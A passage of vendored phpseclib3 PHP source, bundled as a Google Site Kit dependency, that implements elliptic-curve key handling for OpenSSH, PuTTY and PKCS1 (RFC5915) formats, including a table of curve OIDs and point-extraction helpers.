\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519(); $qa = self::extractPoint($parsed['publicKey'], $curve); } else { list($curveName, $publicKey) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ss', $parsed['publicKey']); $curveName = '\\Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\' . $curveName; $curve = new $curveName(); $qa = self::extractPoint("\x00" . $publicKey, $curve); } return ['curve' => $curve, 'QA' => $qa, 'comment' => $parsed['comment']]; } /** * Returns the alias that corresponds to a curve * * @return string */ private static function getAlias(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve) { self::initialize_static_variables(); $reflect = new \ReflectionClass($curve); $name = $reflect->getShortName(); $oid = self::$curveOIDs[$name]; $aliases = \array_filter(self::$curveOIDs, function ($v) use($oid) { return $v == $oid; }); $aliases = \array_keys($aliases); for ($i = 0; $i < \count($aliases); $i++) { if (\in_array('ecdsa-sha2-' . $aliases[$i], self::$types)) { $alias = $aliases[$i]; break; } } if (!isset($alias)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException($name . ' is not a curve that the OpenSSH plugin supports'); } return $alias; } /** * Convert an EC public key to the appropriate format * * @param BaseCurve $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param array $options optional * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, array $publicKey, array $options = []) { $comment = isset($options['comment']) ? $options['comment'] : self::$comment; if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519) { $key = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', 'ssh-ed25519', $curve->encodePoint($publicKey)); if (isset($options['binary']) ? $options['binary'] : self::$binary) { return $key; } $key = 'ssh-ed25519 ' . \base64_encode($key) . ' ' . $comment; return $key; } $alias = self::getAlias($curve); $points = "\x04" . $publicKey[0]->toBytes() . $publicKey[1]->toBytes(); $key = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('sss', 'ecdsa-sha2-' . $alias, $alias, $points); if (isset($options['binary']) ? $options['binary'] : self::$binary) { return $key; } $key = 'ecdsa-sha2-' . $alias . ' ' . \base64_encode($key) . ' ' . $comment; return $key; } /** * Convert a private key to the appropriate format. * * @param BigInteger $privateKey * @param Ed25519 $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $privateKey, \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, array $publicKey, $secret = null, $password = '', array $options = []) { if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\Ed25519) { if (!isset($secret)) { throw new \RuntimeException('Private Key does not have a secret set'); } if (\strlen($secret) != 32) { throw new \RuntimeException('Private Key secret is not of the correct length'); } $pubKey = $curve->encodePoint($publicKey); $publicKey = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', 'ssh-ed25519', $pubKey); $privateKey = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('sss', 'ssh-ed25519', $pubKey, $secret . $pubKey); return self::wrapPrivateKey($publicKey, $privateKey, $password, $options); } $alias = self::getAlias($curve); $points = "\x04" . $publicKey[0]->toBytes() . $publicKey[1]->toBytes(); $publicKey = self::savePublicKey($curve, $publicKey, ['binary' => \true]); $privateKey = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('sssi', 'ecdsa-sha2-' . $alias, $alias, $points, $privateKey); return self::wrapPrivateKey($publicKey, $privateKey, $password, $options); } } <?php /** * PuTTY Formatted EC Key Handler * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PuTTY as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * PuTTY Formatted EC Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PuTTY extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PuTTY { use Common; /** * Public Handler * * @var string */ const PUBLIC_HANDLER = 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Formats\\Keys\\OpenSSH'; /** * Supported Key Types * * @var array */ protected static $types = ['ecdsa-sha2-nistp256', 'ecdsa-sha2-nistp384', 'ecdsa-sha2-nistp521', 'ssh-ed25519']; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $components = parent::load($key, $password); if (!isset($components['private'])) { return $components; } $private = $components['private']; $temp = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $components['type']) . $components['public']); $components = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys\OpenSSH::load($components['type'] . ' ' . $temp . ' ' . $components['comment']); if ($components['curve'] instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { if (\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($private, 4) != "\x00\x00\x00 ") { throw new \RuntimeException('Length of ssh-ed25519 key should be 32'); } $arr = $components['curve']->extractSecret($private); $components['dA'] = $arr['dA']; $components['secret'] = $arr['secret']; } else { list($components['dA']) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('i', $private); $components['curve']->rangeCheck($components['dA']); } return $components; } /** * Convert a private key to the appropriate format. * * @param BigInteger $privateKey * @param BaseCurve $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $privateKey, \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, array $publicKey, $secret = null, $password = \false, array $options = []) { self::initialize_static_variables(); $public = \explode(' ', \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys\OpenSSH::savePublicKey($curve, $publicKey)); $name = $public[0]; $public = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_decode($public[1]); list(, $length) = \unpack('N', \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($public, 4)); \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($public, $length); // PuTTY pads private keys with a null byte per the following: // https://github.com/github/putty/blob/a3d14d77f566a41fc61dfdc5c2e0e384c9e6ae8b/sshecc.c#L1926 if (!$curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { $private = $privateKey->toBytes(); if (!(\strlen($privateKey->toBits()) & 7)) { $private = "\x00{$private}"; } } $private = $curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards ? \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $secret) : \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $private); return self::wrapPrivateKey($public, $private, $name, $password, $options); } /** * Convert an EC public key to the appropriate format * * @param BaseCurve $curve * @param \phpseclib3\Math\Common\FiniteField[] $publicKey * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, array $publicKey) { $public = \explode(' ', \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys\OpenSSH::savePublicKey($curve, $publicKey)); $type = $public[0]; $public = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_decode($public[1]); list(, $length) = \unpack('N', \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($public, 4)); \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($public, $length); return self::wrapPublicKey($public, $type); } } <?php /** * "PKCS1" (RFC5915) Formatted EC Key Handler * * PHP version 5 * * Used by File/X509.php * * Processes keys with the following headers: * * -----BEGIN EC PRIVATE KEY----- * -----BEGIN EC PARAMETERS----- * * Technically, PKCS1 is for RSA keys, only, but we're using PKCS1 to describe * DSA, whose format isn't really formally described anywhere, so might as well * use it to describe this, too. PKCS1 is easier to remember than RFC5915, after * all. I suppose this could also be named IETF but idk * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS1 as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery as MontgomeryCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * "PKCS1" (RFC5915) Formatted EC Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PKCS1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS1 { use Common; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { self::initialize_static_variables(); if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } if (\strpos($key, 'BEGIN EC PARAMETERS') && \strpos($key, 'BEGIN EC PRIVATE KEY')) { $components = []; \preg_match('#-*BEGIN EC PRIVATE KEY-*[^-]*-*END EC PRIVATE KEY-*#s', $key, $matches); $decoded = parent::load($matches[0], $password); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($decoded); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $ecPrivate = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECPrivateKey::MAP); if (!\is_array($ecPrivate)) { throw new \RuntimeException('Unable to perform ASN1 mapping'); } if (isset($ecPrivate['parameters'])) { $components['curve'] = self::loadCurveByParam($ecPrivate['parameters']); } \preg_match('#-*BEGIN EC PARAMETERS-*[^-]*-*END EC PARAMETERS-*#s', $key, $matches); $decoded = parent::load($matches[0], ''); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($decoded); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $ecParams = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECParameters::MAP); if (!\is_array($ecParams)) { throw new \RuntimeException('Unable to perform ASN1 mapping'); } $ecParams = self::loadCurveByParam($ecParams); // comparing $ecParams and $components['curve'] directly won't work because they'll have different Math\Common\FiniteField classes // even if the modulo is the same if (isset($components['curve']) && self::encodeParameters($ecParams, \false, []) != self::encodeParameters($components['curve'], \false, [])) { throw new \RuntimeException('EC PARAMETERS does not correspond to EC PRIVATE KEY'); } if (!isset($components['curve'])) { $components['curve'] = $ecParams; } $components['dA'] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($ecPrivate['privateKey'], 256); $components['curve']->rangeCheck($components['dA']); $components['QA'] = isset($ecPrivate['publicKey']) ? self::extractPoint($ecPrivate['publicKey'], $components['curve']) : $components['curve']->multiplyPoint($components['curve']->getBasePoint(), $components['dA']); return $components; } $key = parent::load($key, $password); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECParameters::MAP); if (\is_array($key)) { return ['curve' => self::loadCurveByParam($key)]; } $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECPrivateKey::MAP); if (!\is_array($key)) { throw new \RuntimeException('Unable to perform ASN1 mapping'); } if (!isset($key['parameters'])) { throw new \RuntimeException('Key cannot be loaded without parameters'); } $components = []; $components['curve'] = self::loadCurveByParam($key['parameters']); $components['dA'] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($key['privateKey'], 256); $components['QA'] = isset($ecPrivate['publicKey']) ? self::extractPoint($ecPrivate['publicKey'], $components['curve']) : $components['curve']->multiplyPoint($components['curve']->getBasePoint(), $components['dA']); return $components; } /** * Convert EC parameters to the appropriate format * * @return string */ public static function saveParameters(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, array $options = []) { self::initialize_static_variables(); if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards || $curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('TwistedEdwards and Montgomery Curves are not supported'); } $key = self::encodeParameters($curve, \false, $options); return "-----BEGIN EC PARAMETERS-----\r\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($key), 64) . "-----END EC PARAMETERS-----\r\n"; } /** * Convert a private key to the appropriate format. * * @param BigInteger $privateKey * @param BaseCurve $curve * @param \phpseclib3\Math\Common\FiniteField\Integer[] $publicKey * @param string $secret optional * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $privateKey, \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, array $publicKey, $secret = null, $password = '', array $options = []) { self::initialize_static_variables(); if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards || $curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Montgomery) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('TwistedEdwards Curves are not supported'); } $publicKey = "\x04" . $publicKey[0]->toBytes() . $publicKey[1]->toBytes(); $key = ['version' => 'ecPrivkeyVer1', 'privateKey' => $privateKey->toBytes(), 'parameters' => new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element(self::encodeParameters($curve)), 'publicKey' => "\x00" . $publicKey]; $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($key, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ECPrivateKey::MAP); return self::wrapPrivateKey($key, 'EC', $password, $options); } } <?php /** * Generic EC Key Parsing Helper functions * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base as BaseCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary as BinaryCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime as PrimeCurve; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards as TwistedEdwardsCurve; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Generic EC Key Parsing Helper functions * * @author Jim Wigginton <terrafrost@php.net> */ trait Common { /** * Curve OIDs * * @var array */ private static $curveOIDs = []; /** * Child OIDs loaded * * @var bool */ protected static $childOIDsLoaded = \false; /** * Use Named Curves * * @var bool */ private static $useNamedCurves = \true; /** * Initialize static variables */ private static function initialize_static_variables() { if (empty(self::$curveOIDs)) { // the sec* curves are from the standards for efficient cryptography group // sect* curves are curves over binary finite fields // secp* curves are curves over prime finite fields // sec*r* curves are regular curves; sec*k* curves are koblitz curves // brainpool*r* curves are regular prime finite field curves // brainpool*t* curves are twisted versions of the brainpool*r* curves self::$curveOIDs = [ 'prime192v1' => '1.2.840.10045.3.1.1', // J.5.1, example 1 (aka secp192r1) 'prime192v2' => '1.2.840.10045.3.1.2', // J.5.1, example 2 'prime192v3' => '1.2.840.10045.3.1.3', // J.5.1, example 3 'prime239v1' => '1.2.840.10045.3.1.4', // J.5.2, example 1 'prime239v2' => '1.2.840.10045.3.1.5', // J.5.2, example 2 'prime239v3' => '1.2.840.10045.3.1.6', // J.5.2, example 3 'prime256v1' => '1.2.840.10045.3.1.7', // J.5.3, example 1 (aka secp256r1) // https://tools.ietf.org/html/rfc5656#section-10 'nistp256' => '1.2.840.10045.3.1.7', // aka secp256r1 'nistp384' => '1.3.132.0.34', // aka secp384r1 'nistp521' => '1.3.132.0.35', // aka secp521r1 'nistk163' => '1.3.132.0.1', // aka sect163k1 'nistp192' => '1.2.840.10045.3.1.1', // aka secp192r1 'nistp224' => '1.3.132.0.33', // aka secp224r1 'nistk233' => '1.3.132.0.26', // aka sect233k1 'nistb233' => '1.3.132.0.27', // aka sect233r1 'nistk283' => '1.3.132.0.16', // aka sect283k1 'nistk409' => '1.3.132.0.36', // aka sect409k1 'nistb409' => '1.3.132.0.37', // aka sect409r1 'nistt571' => '1.3.132.0.38', // aka sect571k1 // from https://tools.ietf.org/html/rfc5915 'secp192r1' => '1.2.840.10045.3.1.1', // aka prime192v1 'sect163k1' => '1.3.132.0.1', 'sect163r2' => '1.3.132.0.15', 'secp224r1' => '1.3.132.0.33', 'sect233k1' => '1.3.132.0.26', 'sect233r1' => '1.3.132.0.27', 'secp256r1' => '1.2.840.10045.3.1.7', // aka prime256v1 'sect283k1' => '1.3.132.0.16', 'sect283r1' => '1.3.132.0.17', 'secp384r1' => '1.3.132.0.34', 'sect409k1' => '1.3.132.0.36', 'sect409r1' => '1.3.132.0.37', 'secp521r1' => '1.3.132.0.35', 'sect571k1' => '1.3.132.0.38', 'sect571r1' => '1.3.132.0.39', // from http://www.secg.org/SEC2-Ver-1.0.pdf 'secp112r1' => '1.3.132.0.6', 'secp112r2' => '1.3.132.0.7', 'secp128r1' => '1.3.132.0.28', 'secp128r2' => '1.3.132.0.29', 'secp160k1' => '1.3.132.0.9', 'secp160r1' => '1.3.132.0.8', 'secp160r2' => '1.3.132.0.30', 'secp192k1' => '1.3.132.0.31', 'secp224k1' => '1.3.132.0.32', 'secp256k1' => '1.3.132.0.10', 'sect113r1' => '1.3.132.0.4', 'sect113r2' => '1.3.132.0.5', 'sect131r1' => '1.3.132.0.22', 'sect131r2' => '1.3.132.0.23', 'sect163r1' => '1.3.132.0.2', 'sect193r1' => '1.3.132.0.24', 'sect193r2' => '1.3.132.0.25', 'sect239k1' => '1.3.132.0.3', // from http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.202.2977&rep=rep1&type=pdf#page=36 /* 'c2pnb163v1' => '1.2.840.10045.3.0.1', // J.4.1, example 1 'c2pnb163v2' => '1.2.840.10045.3.0.2', // J.4.1, example 2 'c2pnb163v3' => '1.2.840.10045.3.0.3', // J.4.1, example 3 'c2pnb172w1' => '1.2.840.10045.3.0.4', // J.4.2, example 1 'c2tnb191v1' => '1.2.840.10045.3.0.5', // J.4.3, example 1 'c2tnb191v2' => '1.2.840.10045.3.0.6', // J.4.3, example 2 'c2tnb191v3' => '1.2.840.10045.3.0.7', // J.4.3, example 3 'c2onb191v4' => '1.2.840.10045.3.0.8', // J.4.3, example 4 'c2onb191v5' => '1.2.840.10045.3.0.9', // J.4.3, example 5 'c2pnb208w1' => '1.2.840.10045.3.0.10', // J.4.4, example 1 'c2tnb239v1' => '1.2.840.10045.3.0.11', // J.4.5, example 1 'c2tnb239v2' => '1.2.840.10045.3.0.12', // J.4.5, example 2 'c2tnb239v3' => '1.2.840.10045.3.0.13', // J.4.5, example 3 'c2onb239v4' => '1.2.840.10045.3.0.14', // J.4.5, example 4 'c2onb239v5' => '1.2.840.10045.3.0.15', // J.4.5, example 5 'c2pnb272w1' => '1.2.840.10045.3.0.16', // J.4.6, example 1 'c2pnb304w1' => '1.2.840.10045.3.0.17', // J.4.7, example 1 'c2tnb359v1' => '1.2.840.10045.3.0.18', // J.4.8, example 1 'c2pnb368w1' => '1.2.840.10045.3.0.19', // J.4.9, example 1 'c2tnb431r1' => '1.2.840.10045.3.0.20', // J.4.10, example 1 */ // http://www.ecc-brainpool.org/download/Domain-parameters.pdf // https://tools.ietf.org/html/rfc5639 'brainpoolP160r1' => '1.3.36.3.3.2.8.1.1.1', 'brainpoolP160t1' => '1.3.36.3.3.2.8.1.1.2', 'brainpoolP192r1' => '1.3.36.3.3.2.8.1.1.3', 'brainpoolP192t1' => '1.3.36.3.3.2.8.1.1.4', 'brainpoolP224r1' => '1.3.36.3.3.2.8.1.1.5', 'brainpoolP224t1' => '1.3.36.3.3.2.8.1.1.6', 'brainpoolP256r1' => '1.3.36.3.3.2.8.1.1.7', 'brainpoolP256t1' => '1.3.36.3.3.2.8.1.1.8', 'brainpoolP320r1' => '1.3.36.3.3.2.8.1.1.9', 'brainpoolP320t1' => '1.3.36.3.3.2.8.1.1.10', 'brainpoolP384r1' => '1.3.36.3.3.2.8.1.1.11', 'brainpoolP384t1' => '1.3.36.3.3.2.8.1.1.12', 'brainpoolP512r1' => '1.3.36.3.3.2.8.1.1.13', 'brainpoolP512t1' => '1.3.36.3.3.2.8.1.1.14', ]; \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::loadOIDs([ 'prime-field' => '1.2.840.10045.1.1', 'characteristic-two-field' => '1.2.840.10045.1.2', 'characteristic-two-basis' => '1.2.840.10045.1.2.3', // per http://www.secg.org/SEC1-Ver-1.0.pdf#page=84, gnBasis "not used here" 'gnBasis' => '1.2.840.10045.1.2.3.1', // NULL 'tpBasis' => '1.2.840.10045.1.2.3.2', // Trinomial 'ppBasis' => '1.2.840.10045.1.2.3.3', ] + self::$curveOIDs); } } /** * Explicitly set the curve * * If the key contains an implicit curve phpseclib needs the curve * to be explicitly provided * * @param BaseCurve $curve */ public static function setImplicitCurve(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve) { self::$implicitCurve = $curve; } /** * Returns an instance of \phpseclib3\Crypt\EC\BaseCurves\Base based * on the curve parameters * * @param array $params * @return BaseCurve|false */ protected static function loadCurveByParam(array $params) { if (\count($params) > 1) { throw new \RuntimeException('No parameters are present'); } if (isset($params['namedCurve'])) { $curve = '\\Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\EC\\Curves\\' . $params['namedCurve']; if (!\class_exists($curve)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Named Curve of ' . $params['namedCurve'] . ' is not supported'); } return new $curve(); } if (isset($params['implicitCurve'])) { if (!isset(self::$implicitCurve)) { throw new \RuntimeException('Implicit curves can be provided by calling setImplicitCurve'); } return self::$implicitCurve; } if (isset($params['specifiedCurve'])) { $data = $params['specifiedCurve']; switch ($data['fieldID']['fieldType']) { case 'prime-field': $curve = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime(); $curve->setModulo($data['fieldID']['parameters']); $curve->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($data['curve']['a'], 256), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($data['curve']['b'], 256)); $point = self::extractPoint("\x00" . $data['base'], $curve); $curve->setBasePoint(...$point); $curve->setOrder($data['order']); return $curve; case 'characteristic-two-field': $curve = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary(); $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($data['fieldID']['parameters']); $params = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($params[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Characteristic_two::MAP); $modulo = [(int) $params['m']->toString()]; switch ($params['basis']) { case 'tpBasis': $modulo[] = (int) $params['parameters']->toString(); break; case 'ppBasis': $temp = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($params['parameters']); $temp = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($temp[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Pentanomial::MAP); $modulo[] = (int) $temp['k3']->toString(); $modulo[] = (int) $temp['k2']->toString(); $modulo[] = (int) $temp['k1']->toString(); } $modulo[] = 0; $curve->setModulo(...$modulo); $len = \ceil($modulo[0] / 8); $curve->setCoefficients(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2hex($data['curve']['a']), \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2hex($data['curve']['b'])); $point = self::extractPoint("\x00" . $data['base'], $curve); $curve->setBasePoint(...$point); $curve->setOrder($data['order']); return $curve; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedCurveException('Field Type of ' . $data['fieldID']['fieldType'] . ' is not supported'); } } throw new \RuntimeException('No valid parameters are present'); } /** * Extract points from a string * * Supports both compressed and uncompressed points * * @param string $str * @param BaseCurve $curve * @return object[] */ public static function extractPoint($str, \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve) { if ($curve instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\TwistedEdwards) { // first step of point deciding as discussed at the following URL's: // https://tools.ietf.org/html/rfc8032#section-5.1.3 // https://tools.ietf.org/html/rfc8032#section-5.2.3 $y = $str; $y = \strrev($y); $sign = (bool) (\ord($y[0]) & 0x80); $y[0] = $y[0] & \chr(0x7f); $y = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($y, 256); if ($y->compare($curve->getModulo()) >= 0) { throw new \RuntimeException('The Y coordinate should not be >= the modulo'); } $point = $curve->recoverX($y, $sign); if (!$curve->verifyPoint($point)) { throw new \RuntimeException('Unable to verify that point exists on curve'); } return $point; } // the first byte of a bit string represents the number of bits in the last byte that are to be ignored but, // currently, bit strings wanting a non-zero amount of bits trimmed are not supported if (($val = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($str)) != "\x00") { throw new \UnexpectedValueException('extractPoint expects the first byte to be null - not ' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2hex($val)); } if ($str == "\x00") { return []; } $keylen = \strlen($str); $order = $curve->getLengthInBytes(); // point compression is being used if ($keylen == $order + 1) { return $curve->derivePoint($str); } // point compression is not being used if ($keylen == 2 * $order + 1) { \preg_match("#(.)(.{{$order}})(.{{$order}})#s", $str, $matches); list(, $w, $x, $y) = $matches; if ($w != "\x04") { throw new \UnexpectedValueException('The first byte of an uncompressed point should be 04 - not ' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2hex($val)); } $point = [$curve->convertInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($x, 256)), $curve->convertInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($y, 256))]; if (!$curve->verifyPoint($point)) { throw new \RuntimeException('Unable to verify that point exists on curve'); } return $point; } throw new \UnexpectedValueException('The string representation of the points is not of an appropriate length'); } /** * Encode Parameters * * @todo Maybe at some point this could be moved to __toString() for each of the curves? * @param BaseCurve $curve * @param bool $returnArray optional * @param array $options optional * @return string|false */ private static function encodeParameters(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Base $curve, $returnArray = \false, array $options = []) { $useNamedCurves = isset($options['namedCurve']) ? $options['namedCurve'] : self::$useNamedCurves; $reflect = new \ReflectionClass($curve); $name = $reflect->getShortName(); if ($useNamedCurves) { if (isset(self::$curveOIDs[$name])) { if ($reflect->isFinal()) { $reflect = $reflect->getParentClass(); $name = $reflect->getShortName(); } return $returnArray ? ['namedCurve' => $name] : 